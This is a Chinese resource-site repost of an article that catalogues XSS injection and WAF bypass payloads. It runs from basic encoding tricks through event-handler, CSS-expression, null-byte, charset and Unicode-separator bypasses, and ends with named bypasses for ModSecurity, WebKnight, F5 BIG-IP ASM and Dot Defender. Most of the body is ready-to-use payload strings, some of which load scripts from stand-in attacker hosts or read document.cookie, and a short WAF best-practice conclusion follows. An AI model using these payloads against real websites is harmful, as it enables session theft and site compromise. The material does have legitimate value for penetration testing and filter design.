HI,欢迎您光临本站,秉承服务宗旨,销售只是起点,服务永无止境!
    • 短视频文案
      • 励志哲理
      • 名言美句
      • 情感语录
      • 回复热评
      • 解说文案
    • 短视频素材
      • 情感励志
      • 美食小吃
      • 体育运动
      • 生活人文
      • 妙招好物
      • 风景风光
      • 影音娱乐
      • 颜值时尚
      • 游戏动漫
      • 自然景观
    • 短视频课程
      • 同城课程
      • 带货课程
      • 投放课程
      • 玩法课程
    • 中视频素材
    • 短视频工具
    • 副业项目
资源分享吧
  • 首页
  • CMS模板host
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材
    • PPT模板377
    • 简历模板0
  • 站长学院
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
登录/注册
  • 精品会员专享
  • 会员折扣下载
  • 每日海量更新
立即开通 开通会员抄底价
当前位置:资源分享吧 > XSS绕过技术 XSS插入绕过一些方式总结
也想出现在这里? 联系我们吧

XSS绕过技术 XSS插入绕过一些方式总结

作者 : 小编 本文共13662个字,预计阅读时间需要35分钟 发布时间: 2021-06-13 共1.78K人阅读
也想出现在这里? 联系我们吧
0x00前言

我们友情进行XSS检查,偶然跳出个小弹窗,其中我们总结了一些平时可能用到的XSS插入方式,方便我们以后进行快速检查,也提供了一定的思路,其中XSS有反射、存储、DOM这三类,至于具体每个类别的异同之处,本文不做学术介绍,直接介绍实际的插入方式。

四种超级基础的绕过方法。 1.转换为ASCII码 例子:原脚本为<script>alert(‘I love F4ck’)</script > 通过转换,变成: <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script> 2.转换为HEX(十六进制) 例子:原脚本为<script>alert(‘I love F4ck’)</script> 通过转换,变成: %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e 3.转换脚本的大小写 例子:原脚本为<script>alert(‘I love F4ck’)</script> 转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT> 4.增加闭合标记”> 例子:原脚本为<script>alert(‘I love F4ck’)</script> 转换为:”><script>alert(‘I love F4ck’)</script> 更详细绕过技术请参考此网页 https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet 转换工具使用的是火狐的 hackbar mozilla addon.

0x01 常规插入及其绕过
1 Script 标签

绕过进行一次移除操作:<scr<script>ipt>alert("XSS")</scr<script>ipt>Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本:<script>alert("XSS")</script><script src="http://attacker.org/malicious.js"></script>

2 JavaScript 事件

我们可以像如下这样在元素中定义 JavaScript 事件:<div onclick="alert(\’xss\’)">这个 JavaScript 代码当有人点击它后就会被执行,同时还有其他事件如页面加载或移动鼠标都可以触发这些事件。绝大部分的时间都被过滤器所移除了,但是依旧还有少量事件没有被过滤,例如,onmouseenter 事件:<div onmouseenter="alert(\’xss\’)">当用户鼠标移动到 div 上时就会触发我们的代码。另一个绕过的办法就是在属性和= 之间插入一个空格:<div onclick ="alert(\’xss\’)">

3 行内样式(Inline style)

我们同样可以在行内样式里利用 IE 浏览器支持的动态特性:<div style="color: expression(alert(\’XSS\’))">过滤器会检查关键字 style,随后跟随的不能是 <,在随后是 expression:/style=[^<]*((expression\\s*?\\([^<]*?\\))|(behavior\\s*:))[^<]*(?=\\>)/Uis所以,让我们需要把 < 放到其他地方:<div style="color: \'<\’; color: expression(alert(\’XSS\’))">

4 CSS import

IE 浏览器支持在 CSS 中扩展 JavaScript,这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的,因为攻击者现在可以在原始页面中执行 JavaScript 代码了。<style>@import url("http://attacker.org/malicious.css");</style>malicious.css:body { color: expression(alert(\’XSS\’));}为了绕过对 @import 的过滤,可以在 CSS 中使用反斜杠进行绕过:<style>@imp\\ort url("http://attacker.org/malicious.css");</style>IE 浏览器会接受反斜杠,但是我们绕过了过滤器。

5 Javascript URL

链接标签里可以通过在 URL 中使用 javascript:… 来执行 JavaScript:<a href="javascript:alert(\’test\’)">link</a>上面的过滤会从代码中移除 javascript:,所以我们不能直接这么写代码。但我们可以尝试改变 javascript:的写法,使它依旧可以被浏览器执行但又不匹配正则表达式。首先来尝试下 URL 编码:<a href="javascript:alert(\’xss\’)">link</a>上面这段代码不匹配正则表达式,但是浏览器依旧会执行它,因为浏览器会首先进行 URL 解码操作。另外,我们还可以使用 VBScript,虽然它在 IE11 中被禁用了,但依旧可以运行在旧版本的 IE 或者启用兼容模式的 IE11 上。我们可以使用类似上面 JavaScript 的方式来插入 VBScript 代码:<a href=\’vbscript:MsgBox("XSS")\’>link</a>\’-confirm`1`-\’

\’-confirm(1)-\’

1 利用字符编码

%c1;alert(/xss/);//

2 绕过长度限制

"onclick=alert(1)//"><!—-><script>alert(xss);<script>

3 使用<base>标签

<script>alert(navigator.userAgent)<script><script>alert(88199)</script><script>confirm(88199)</script><script>prompt(88199)</script><script>\\u0061\\u006C\\u0065\\u0072\\u0074(88199)</script><script>+alert(88199)</script><script>alert(/88199/)</script><script src=data:text/javascript,alert(88199)></script><script src=&#100&#97&#116&#97:text/javascript,alert(88199)></script><script>alert(String.fromCharCode(49,49))</script><script>alert(/88199/.source)</script><script>setTimeout(alert(88199),0)</script><script>document[\’write\’](88199);</script><anytag onmouseover=alert(15)>M<anytag onclick=alert(16)>M<a onmouseover=alert(17)>M<a onclick=alert(18)>M<a href=javascript:alert(19)>M<button/onclick=alert(20)>M<form><buttonformaction=javascript&colon;alert(21)>M<form/action=javascript:alert(22)><input/type=submit><form onsubmit=alert(23)><button>M<form onsubmit=alert(23)><button>M<img src=x onerror=alert(24)> 29<body/onload=alert(25)><bodyonscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><iframe src="http://0x.lv/xss.swf"></iframe><iframe/onload=alert(document.domain)></iframe><IFRAME SRC="javascript:alert(29);"></IFRAME><meta http-equiv="refresh" content="0;url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E"><object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object><object data="javascript:alert(document.domain)"><marquee onstart=alert(30)></marquee><isindex type=image src=1 onerror=alert(31)><isindex action=javascript:alert(32) type=image><input onfocus=alert(33) autofocus><input onblur=alert(34) autofocus><input autofocus>

0x03 规则探测及绕过
1WAF规则探测

1、使用无害的payload,类似<b>,<i>,<u>观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;3、尝试以下的payload<script>alert(1);</script><script>prompt(1);</script><script>confirm (1);</script>

<script src="http://rhainfosec.com/evil.js">

2 大小写混合字符

<scRiPt>alert(1);</scrIPt>1、如果大小写不行的话,<script>被过滤尝试<scr<script>ipt>alert(1)</scr<script>ipt>;2、使用<a>标签测试<a href=“http://www.google.com">Clickme</a><a被过滤?href被过滤?其他内容被过滤?如果没有过滤尝试使用<a href=”javascript:alert(1)”>Clickme</a>尝试使用错误的事件查看过滤<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>HTML5拥有150个事件处理函数,可以多尝试其他函数<body/onhashchange=alert(1)><a href=#>clickit

3 测试其他标签

src属性<img src=x onerror=prompt(1);><img/src=aaa.jpg onerror=prompt(1);<video src=x onerror=prompt(1);><audio src=x onerror=prompt(1);>iframe<iframesrc="javascript:alert(2)"><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">Embed<embed/src=//goo.gl/nlX0P>Action<form action="Javascript:alert(1)"><input type=submit><isindex action="javascript:alert(1)" type=image><isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image><isindex action=data:text/html, type=image>mario验证<span class="pln"> </span><span class="tag">&lt;formaction</span><span class="pun">=</span><span class="atv">&amp;#039;data:text&amp;sol;html,&amp;lt;script&amp;gt;alert(1)&amp;lt/script&amp;gt&amp;#039;</span><span class="tag">&gt;&lt;button&gt;</span><span class="pln">CLICK</span>“formaction”属性<isindexformaction="javascript:alert(1)" type=image><input type="image" formaction=JaVaScript:alert(0)><form><button formaction=javascript&colon;alert(1)>CLICKME“background”属性<table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6“posters” 属性<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5“data”属性<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="><object/data=//goo.gl/nlX0P?“code”属性<applet code="javascript:confirm(document.cookie);"> // Firefox Only<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>事件处理<svg/onload=prompt(1);><marquee/onstart=confirm(2)>/<body onload=prompt(1);><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><video><source onerror="javascript:alert(1)">短payload<q/oncut=open()><q/oncut=alert(1)> // Useful in-case of payload restrictions.嵌套欺骗<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)><body language=vbsonload=alert-1 // Works with IE8<command onmouseover="\\x6A\\x61\\x76\\x61\\x53\\x43\\x52\\x49\\x50\\x54\\x26\\x63\\x6F\\x6C\\x6F\\x6E\\x3B\\x63\\x6F\\x6E\\x66\\x6 9\\x72\\x6D\\x26\\x6C\\x70\\x61\\x72\\x3B\\x31\\x26\\x72\\x70\\x61\\x72\\x3B">Save</command> // Works with IE8圆括号被过滤<a onmouseover="javascript:window.onerror=alert;throw 1><img src=x onerror="javascript:window.onerror=alert;throw 1"><body/onload=javascript:window.onerror=eval;throw'=alert\\x281\\x29';Expression 属性<img style="xss:expression(alert(0))"> // Works upto IE7.<div style="color:rgb(''x:expression(alert(1))"></div> // Works upto IE7.<style>#test{x:expression(alert(/XSS/))}</style> // Works upto IE7“location”属性<a onmouseover=location=’javascript:alert(1)>click<body onfocus="location='javascrpt:alert(1) >123其他Payload<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\\u0061lert(1);"></g></svg> // By @secalert<svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"</svg> // By @secalert<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/><math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed();:被过滤<svg><script>alert&#40/1/&#41</script> // Works With All Browsers( is html encoded to &#40) is html encoded to &#41Opera的变量<svg><script>alert&#40 1&#41 // Works with Opera Only实体解码&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;<a href="j&#x26#x41;vascript:alert%252831337%2529">Hello</a>编码JavaScript是很灵活的语言,可以使用十六进制、Unicode、HTML等进行编码,以下属性可以被编码(支持HTML, Octal, Decimal,Hexadecimal, and Unicode)href=action=formaction=location=on*=name=background=poster=src=code=data= //只支持base64

4 基于上下文的过滤

WAF最大的问题是不能理解内容,使用黑名单可以阻挡独立的js脚本,但仍不能对xss提供足够的保护,如果一个反射型的XSS是下面这种形式

1 输入反射属性

<input value="XSStest" type=text>我们可以使用 “><imgsrc=x onerror=prompt(0);>触发,但是如果<>被过滤,我们仍然可以使用“ autofocusonfocus=alert(1)//触发,基本是使用“ 关闭value属性,再加入我们的执行脚本" onmouseover="prompt(0) x="" onfocusin=alert(1) autofocus x="" onfocusout=alert(1) autofocus x="" onblur=alert(1) autofocus a="输入反射在<script>标签内类似这种情况:<script>Varx=”Input”;</script>通常,我们使用“></script>,闭合前面的</script>标签,然而在这种情况,我们也可以直接输入执行脚本alert(), prompt()confirm() ,例如:“;alert(1)//

2 非常规事件监听

DOMfocusin,DOMfocusout,等事件,这些需要特定的事件监听适当的执行。例如:";document.body.addEventListener("DOMActivate",alert(1))//";document.body.addEventListener("DOMActivate",prompt(1))//";document.body.addEventListener("DOMActivate",confirm(1))//此类事件的列表DOMAttrModifiedDOMCharacterDataModifiedDOMFocusInDOMFocusOutDOMMouseScrollDOMNodeInsertedDOMNodeInsertedIntoDocumentDOMNodeRemovedDOMNodeRemovedFromDocumentDOMSubtreeModified

3 超文本内容

代码中的情况如下<ahref=”Userinput”>Click</a>可以使用javascript:alert(1)//直接执行<ahref=”javascript:alert(1)//”>Click</a>

4 变形

主要包含大小写和JavaScript变形javascript:alert(1)javaSCRIPT&colon;alert(1)JaVaScRipT:alert(1)javas&Tab;cript:\\u0061lert(1);javascript:\\u0061lert(1&#x29avascript:alert&lpar;document&period;cookie&rpar; // AsharJavedIE10以下和URI中可以使用VBScriptvbscript:alert(1);vbscript:alert(1);vbscr&Tab;ipt:alert(1)"Data URldata:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

5 JSON内容

反射输入encodeURIComponent('userinput')可以使用-alert(1)–prompt(1)–confirm(1)-结果encodeURIComponent(''-alert(1)-'')encodeURIComponent(''-prompt(1)-'')

6 输入反射在svg标签内

源码如下:<svg><script>varmyvar=”YourInput”;</script></svg>可以输入www.site.com/test.php?var=text”;alert(1)//如果系统编码了”字符<svg><script>varmyvar="text&quot;;alert(1)//";</script></svg>原因是引入了附加的(XML)到HTML内容里,可以使用2次编码处理浏览器BUG

7 字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集编码,我们可以绕过99% 的WAF过滤。示例http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS可以控制编码,提交http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><imgsrc=x onerror=prompt(0);>可以修改为UTF-32编码形式???script?alert(1)?/script?http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

8 空字节

最长用来绕过mod_security防火墙,形式如下:<scri%00pt>alert(1);</scri%00pt><scri\\x00pt>alert(1);</scri%00pt><s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>空字节只适用于PHP 5.3.8以上的版本

9 语法BUG

RFC声明中节点名称不能是空格,以下的形式在javascript中不能运行<script>alert(1);</script><%0ascript>alert(1);</script><%0bscript>alert(1);</script><%, <//, <!,<?可以被解析成<,所以可以使用以下的payload<// style=x:expression\\28write(1)\\29> // Works upto IE7 参考http://html5sec.org/#71<!–[if]><script>alert(1)</script –> // Works upto IE9 参考http://html5sec.org/#115<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> // Works in IE7 参考 http://html5sec.org/#77<%div%20style=xss:expression(prompt(1))> // Works Upto IE7

10 Unicode分隔符

[on\\w+\\s*]这个规则过滤了所有on事件,为了验证每个浏览器中有效的分隔符,可以使用fuzzing方法测试0×00到0xff,结果如下:IExplorer= [0x09,0x0B,0x0C,0x20,0x3B]Chrome = [0x09,0x20,0x28,0x2C,0x3B]Safari = [0x2C,0x3B]FireFox= [0x09,0x20,0x28,0x2C,0x3B]Opera = [0x09,0x20,0x2C,0x3B]Android = [0x09,0x20,0x28,0x2C,0x3B]x0b在Mod_security中已经被过滤,绕过的方法:<a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>rhainfosec

11 缺少X-frame选项

通常会认为X-frame是用来防护点击劫持的配置,其实也可以防护使用iframe引用的xss漏洞DocmodesIE引入了doc-mode很长时间,提供给老版本浏览器的后端兼容性,有风险,攻击情景是黑客可以引用你站点的框架,他可以引入doc-mode执行css表达式expression(open(alert(1)))以下POC可以插入到IE7中<html> <body> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <iframesrc="https://targetwebsite.com"> </body> </html>

12 Window.name欺骗

情景:我们用iframe加载一个页面,我们可以控制窗口的名称,这里也可以执行javascript代码POC<iframesrc='http://www.target.com?foo="xss autofocus/AAAAA onfocus=location=window.name//'name="javascript:alert("XSS")"></iframe>DOM型XSS服务器不支持过滤DOM型的XSS,因为DOM型XSS总是在客户端执行,看一个例子:<script> vari=location.hash; document.write(i); </script>在一些情况下,反射型XSS可以转换成DOM型XSS:http://www.target.com/xss.php?foo=<svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()上面的POC只在[.+都被允许的情况下适用,可以使用location.hash注入任何不允许的编码Location.hash[1] = : // Defined at the first position after the hash.Location.hash[2]= ( // Defined at the second position after the hasLocation.hash[3] = ) // Defined at third position after the hash.如果有客户端过滤可能不适用

13 ModSecurity绕过

<scri%00pt>confirm(0);</scri%00pt><a/onmouseover[\\x0b]=location='\\x6A\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x3A\\x61\\x6C\\x65\\x72\\x74\\x28\\x30\\x29\\x3B'>rhainfosec参考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

5 WEB KNIGHT绕过

<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image><marquee/onstart=confirm(2)>F5 BIG IP ASM and Palo ALTO绕过<table background="javascript:alert(1)"></table> //IE6或者低版本Opera “/><marquee onfinish=confirm(123)>a</marquee>Dot Defender绕过<svg/onload=prompt(1);><isindex action="javas&tab;cript:alert(1)" type=image>

<marquee/onstart=confirm(2)>

0x04结论

黑名单方式永远不是最好的解决办法,但是相对与白名单效率很高,对于WAF供应商来说,最好的实践如下:1、开发者和管理员要注意WAF只能缓解攻击,并且针对已知的弱点的防护只是和源代码修复的方法打个时间差;2、要保持WAF的规则库更新;3、WAF可以配置参数限制,需要提供手册用于配置参数content-length最大最小长度,content-type类型,在入侵时进行告警;

4、如果WAF依据黑名单,要确保可以阻断已知的浏览器BUG,并且相应规则库要及时更新。

网络安全 脚本入侵 脚本攻防 脚本防护
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » XSS绕过技术 XSS插入绕过一些方式总结

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
小编

小编 VIP

分享到:
上一篇
一句话木马后门在防注入中的重生
下一篇
入侵RedHat Linux系统的方法

发表评论 取消回复

要发表评论,您必须先登录。

最新文章
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
标签云
DEDECMS (483) dedecms教程 (326) eyoucms (270) html (364) html5 (1717) html模板 (733) Linux (1245) linux教程 (1245) wordpress教程 (380) 下载 (277) 代码 (816) 企业网站模板 (874) 企业网站模板下载 (874) 免费企业网站模板 (874) 入侵防御 (270) 公司网站模板 (874) 切换 (502) 动画 (594) 国内网站模板 (324) 图片 (582) 技术网络漏洞 (347) 插件 (447) 效果 (765) 源码 (381) 漏洞 (371) 漏洞分析 (347) 特效 (789) 电脑使用 (4064) 电脑操作 (4064) 短视频素材 (606) 笔记本电脑价格 (4037) 笔记本电脑品牌排行 (4037) 笔记本电脑知识 (4037) 笔记本电脑评测 (4037) 素材 (483) 织梦 (407) 织梦教程 (342) 网站模板 (436) 网站源码 (417) 网站漏洞检测 (347) 网络安全WEB漏洞 (347) 菜单 (299) 视频 (376) 这是 (345) 鼠标 (417)

限时优惠

【阿里云】云产品采购季,助力行业复工。新用户专享1折起,云服务器低至0.75折,更多产品可叠加专属代金券下单
立即查看

相关推荐

使用爬虫采集网站时,解决被封IP的几种方法
小编小编

使用爬虫采集网站时,解决被封IP的几种方法

方法1.之前由于公司项目需要,采集过google地图数据,还有一些大型网站数据。经验如下:1.IP必须需要,像@alswl 说的非常正确,ADSL。如果有条件,其实可以跟机房多申请外网IP。2.在有外网IP的机器上,部署代理服务器。3.你的程序,使用轮...
  • 1.74K
  • 免费
  • 下载
全国各地敲响网络安全警钟 河南企业如何应对?
小编小编

全国各地敲响网络安全警钟 河南企业如何应对?

一不留神违法了~冤吗? 真相是:重庆这家公司自2017年6月1日后,在提供互联网数据中心服务时,存在未依法留存用户登录相关网络日志的违法行为,根据《中华人民共和国网络安全法》第二十一条(三)项:采取监测、记录网络运行状态、网络安全事件的技术措施,并按照...
  • 4.8K
  • 免费
  • 下载
电脑文件加密软件哪个好、文件夹加密软件排行榜、磁盘加密软件哪个好
小编小编

电脑文件加密软件哪个好、文件夹加密软件排行榜、磁盘加密软件哪个好

无论是在单位还是个人电脑中,我们经常会在电脑上存储一些重要的文件,如何保护这些文件安全,防止未经授权随意查看、访问的行为呢?可以通过一些电脑文件加密软件来实现。 大势至电脑文件加密软件(下载地址:http://www.grabsun.com/dnwjj...
  • 3.03K
  • 免费
  • 下载
中国南海和东南亚问题相关的网络攻击组织 捕获Patchwork APT攻击
小编小编

中国南海和东南亚问题相关的网络攻击组织 捕获Patchwork APT攻击

南海仲裁这样的闹剧昨天还是宣布了一个可笑的判决,我泱泱大国昨天在海南广东等地派出的各种军队战舰证明这次我们可不是说着玩玩。“若有战,召必回”湿了多少人的眼眶。这边,黑客军团里,也开始借南海问题各种攻击。 最近,一个与东南亚和中国...
  • 2.15K
  • 免费
  • 下载
  • 3058本站运营(天)
  • 62844用户总数
  • 26548资源数(个)
  • 2近7天更新(个)
  • 82301资源大小(GB)
加入VIP获取全站资源

「资源分享吧」 ZYFX8.CN

国内极具人气的网络源码资源交流学习平台
下载源码文章,学软件教程,找灵感素材,尽在「资源分享吧」

按Ctrl+D收藏本站

找资源就上「 资源分享吧 」

WWW.ZYFX8.CN

资源分享吧

资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,网站以网站源码、网站模板、网页特效为主要内容,以“共享创造价值”为理念,以“尊重原创”为准则。

本站导航
  • 热门标签
  • 网站专题
  • 站点地图
更多导航
  • 申请友链
  • 用户协议
  • 免责声明
快速搜索
    友情链接 自助申请友链
  • RiTheme主题
  • wordpress主题
  • 在线PS修图
  • 源码下载
  • 网站模板
  • 资源分享吧
Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
资源分享吧(www.zyfx8.cn)是一家专门做精品素材的网站,以“共享创造价值”为理念,以“尊重原创”为准则。
  • 会员特惠
  • 签到
  • 客服

    在线客服

    点我联系

    直接说出您的需求!
    切记!带上资源链接与问题!

    工作时间: 9:30-21:30

  • 更新
    日历
  • 全屏
  • 首页

  • 签到

  • 切换

  • 客服

资源分享吧
  • 登录
  • 注册
or
or
忘记密码?
资源分享吧
  • 首页
  • CMS模板host ►
    • DEDECMS模板965
    • 易优CMS318
    • WordPress模板146
    • Discuz模板101
    • 帝国CMS102
    • 苹果cms78
    • Pbootcms24
    • zblog模板2
  • 整站源码 ►
    • 教育/交友/直播76
    • 商城/淘宝/网店26
    • 门户/论坛/信息27
    • 小说/新闻/博客76
    • 电影/视频/音乐22
    • 图片/素材/下载49
    • 支付/金融/货币356
    • 导航/目录/友链25
    • 会员/推广/任务57
    • 公众号/小程序/游戏133
  • 一元夺宝new
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    E启学在线网校网站在线教育校园教学平台程序系统V1.0源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    Laravel开发MeEdu在线点播网站源码 知识付费应用系统源码
    一比一精仿电影挖片网苹果cmsv10模板
    一比一精仿电影挖片网苹果cmsv10模板
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    织梦高仿dede58织梦模板下载站完整无错整站版源码 1.69GB打包
    蓝色清晰织梦资源网下载站源码
    蓝色清晰织梦资源网下载站源码
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    全景通旗舰版最新源码 内核到krpano1.19pr8 支持任何高清图
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    thinkPHP音视频素材资源下载站整站源码 带会员系统+支付接口
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    仿集图网模板图片素材类模板织梦下载站源码带整站数据
    织梦蓝色图纸展示类企业网站源码
    织梦蓝色图纸展示类企业网站源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    Thinkphp5.0响应式进销存仓库管理系统源码
    prev
    next
  • 网页素材 ►
    • 网页游戏148
    • 网页模板4723
    • 特效代码5467
  • 办公素材 ►
    • PPT模板377
    • 简历模板0
  • 站长学院 ►
    • DEDE教程352
    • wordpress教程416
    • SEO教程124
    • 其它文档教程13
  • 更多 ►
    • 办公教程4
    • 群辉教程12
    • 电脑基础7124
    • GPS导航
    • 安卓系统15 ►
      • Android资讯2
      • ROM0
      • 教程工具0
    • Win系统169 ►
      • Windows XP3
      • Windows 77
      • Windows 80
      • Windows 1012
      • 服务器系统1129
      • Win主题12
      • Win教程26
      • Win资讯0
      • Win软件98
    • 站点标签
    • 更新日志
    • 其他10
文章展示
交易所源码搭建教程java多语言部署
交易所源码搭建教程java多语言部署
餐饮火锅加盟网站pbootcms模板源码
餐饮火锅加盟网站pbootcms模板源码
源码下载新闻资讯博客网站pbootcms模板
源码下载新闻资讯博客网站pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
绿色人造草坪地坪施工网站源码pbootcms模板
红色火锅加盟网站pbootcms模板源码
红色火锅加盟网站pbootcms模板源码
蓝色源码钢结构工程基建网站pbootcms模板
蓝色源码钢结构工程基建网站pbootcms模板
开通VIP 享更多特权,建议使用QQ登录
账号登录/注册
QQ登录
微博登录
×

    回馈用户限时特惠

    「 资源分享吧 」国内极具人气的网络资源交流学习平台,海量资源每天更新,优质资源畅快下载

    终身SVIP原价 590元,国庆限时活动价仅需 “ 59元 ”,终身免费~~机不可失~~


    立即开通永久会员>>